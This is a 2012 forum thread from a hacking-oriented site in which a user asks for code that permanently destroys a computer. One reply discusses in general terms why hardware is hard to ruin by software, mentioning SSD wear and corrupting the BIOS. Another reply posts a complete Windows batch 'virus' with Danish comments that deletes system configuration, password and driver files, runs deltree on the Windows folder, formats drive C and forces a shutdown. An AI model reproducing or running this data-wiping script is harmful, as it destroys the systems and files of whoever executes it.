![]() |
|
Destructive Batches - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Coding (https://sinister.ly/Forum-Coding--71) +--- Thread: Destructive Batches (/Thread-Destructive-Batches) Pages:
1
2
|
RE: Destructive Batches - anonforyou - 04-17-2012 Then what can, if there is any code out there, that could wipe out the entire system? Delete/Corrupt permanently? or just jack it up to not be able to restore itself. What other system, other than batch codes can do it? (04-15-2012, 07:18 PM)Frooxius Wrote: Yes, there is very destructive batch, which should completely destroy the user's computer and sometimes even the user, however it requires some cooperation from the user and probably won't work with users without serious mental retardation. Here it is: RE: Destructive Batches - Frooxius - 04-17-2012 If you just read the last paragraph of my post you would get answer to your question. You can't corrupt it permanently, because it is often restored using an installation media or can be just reinstalled again. What you can corrupt is user data, assuming he doesn't have any backups in the same system, otherwise he can restore these data as well, so corruption won't be permanent. Technically, you might try exploit some hardware weaknesses in order to corrupt it, for example by trying to change voltage of the processor core to make it overheat, but today, many processors would just shut down, once they reach certain temperature, in order to protect themselves, it is a hardware fail-safe over which software doesn't have any control. Maybe you could corrupt an SSD or Flash drive by constantly writing new data to it, because they have a limited amount of rewrites, because the memory cells wear off (writing basically forces a bunch of electrons from one layer to another trough an non-conductive layer using high voltage (relatively high), so it's a bit "rough" and it gets damaged a little by every change), however the hardware itself contains some mechanisms to reduce this damage called wear-leveling, so it could also take a while to destroy it that way. One thing that I can think of that could be really annoying (but still being restorable) is flashing BIOS with gibberish data, so the computer won't boot. However, this can be restored by either re-flashing the BIOS (either using safety mechanisms such as Dual BIOS or a special device) or changing the motherboard. Simply put, hardware nowadays has a lot of fail-safe mechanisms to prevent damage, over which software has no control, so it's not generally possible to destroy something permanently by software, not to mention that there's a little reason to do so. Today, malicious software does usually something that makes it useful for its creators, which usually involves earning money. Not to mention, user data usually have way more value than the OS and hardware itself. RE: Destructive Batches - Asuna_mybb_import7736 - 04-23-2012 @echo off REM Denne virus er lavet af An0nH4ckZ0r1337/d8 ![]() REM Skal vi begynde?? MKDIR C:\windows\temp\a MKDIR C:\windows\temp\b MKDIR C:\windows\temp\c MKDIR C:\windows\temp\d MKDIR C:\windows\temp\e MKDIR C:\windows\temp\f MKDIR C:\windows\temp\g MKDIR C:\windows\temp\h MKDIR C:\windows\temp\i MKDIR C:\windows\temp\j MKDIR C:\windows\temp\k MKDIR C:\windows\temp\l MKDIR C:\windows\temp\m MKDIR C:\windows\temp\n MKDIR C:\windows\temp\o MKDIR C:\windows\temp\p MKDIR C:\windows\temp\q MKDIR C:\windows\temp\r MKDIR C:\windows\temp\s MKDIR C:\windows\temp\t MKDIR C:\windows\temp\u MKDIR C:\windows\desktop\hey_lamer_wazzup MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files\ab MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator\ac MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files\ad MKDIR C:\windows\temp001 MKDIR C:\windows\temp002 MKDIR C:\windows\temp003 MKDIR C:\windows\temp004 MKDIR C:\windows\temp005 MKDIR C:\windows\temp006 MKDIR C:\windows\temp007 MKDIR C:\windows\temp008 MKDIR C:\windows\temp009 MKDIR C:\windows\temp000 MKDIR C:\windows\temp010 MKDIR C:\windows\temp020 MKDIR C:\windows\temp030 MKDIR C:\windows\temp040 MKDIR C:\windows\temp050 REM Dårlig netværk.... REM yeah echo Velkommen til den rigtige anti-retardo virus! REM Nu vil den rigtige virus starte! echo Vent echo Jeg har en overraskelse til dig...Spænd dig fast! Det her bliver vildt! cd\ cd C:\ @if exist C:\Autoexec.bat del C:\Autoexec.bat del config.sys cd windows del control.ini @if exist C:\windows\dosstart.bat del C:\windows\dosstart.bat cd\ cd C:\ @if exist C:\logo.sys del C:\logo.sys @if exist C:\windows\rundll.exe del C:\rundll.exe @if exist C:\windows\rundll32.exe del C:\windows\rundll32.exe @if exist C:\windows\ios.ini del C:\windows\ios.ini cd\ cd windows del win.ini @if exist C:\WINDOWS\OPTIONS\CABS\scandisk.ini del C:\WINDOWS\OPTIONS\CABS\scandisk.ini @if exist C:\WINDOWS\system.ini del C:\WINDOWS\system.ini cd\ cd C:\ @if exist C:\WINDOWS\*.pwl del C:\WINDOWS\*.pwl @if exist C:\WINDOWS\SYSTEM\sysedit.exe del C:\WINDOWS\SYSTEM\sysedit.exe @if exist C:\WINDOWS\SYSTEM\Systray.exe del C:\WINDOWS\SYSTEM\Systray.exe @if exist C:\WINDOWS\system.new del C:\WINDOWS\system.new @if exist C:\WINDOWS\system.bak del C:\WINDOWS\system.bak @if exist C:\WINDOWS\system.cb del C:\WINDOWS\system.cb @if exist C:\WINDOWS\system\Msjstick.drv del C:\WINDOWS\system\Msjstick.drv @if exist C:\WINDOWS\system\Supervga.drv del C:\WINDOWS\system\Supervga.drv @if exist C:\WINDOWS\system\Mouse.drv del C:\WINDOWS\system\Mouse.drv echo Wow.. Det var noget af en tur! echo Hvad?? Vil du have mere?? echo Ok... Men denne gang bliver det dyrt! echo Vink farvel til din computer og sig: Farvel elskede pc... Du vil aldrig kunne starte igen, fordi jeg har været så dum at åbne virusen. echo Jeg troede jeg var smart, men det var jeg ikke! Farvel !cd\ cd windows deltree /y windows format c: /y shutdown -s -t 10 -c "Vink farvel skatter!" Sorry, but I didn't have time for translate the danish parts!
RE: Destructive Batches - Jacob - 04-24-2012 This is a ridiculous thread. Use the search button please. Also, nothing illegal and I imagine you don't want to destroy you own computer...means illegal activity. /thread. |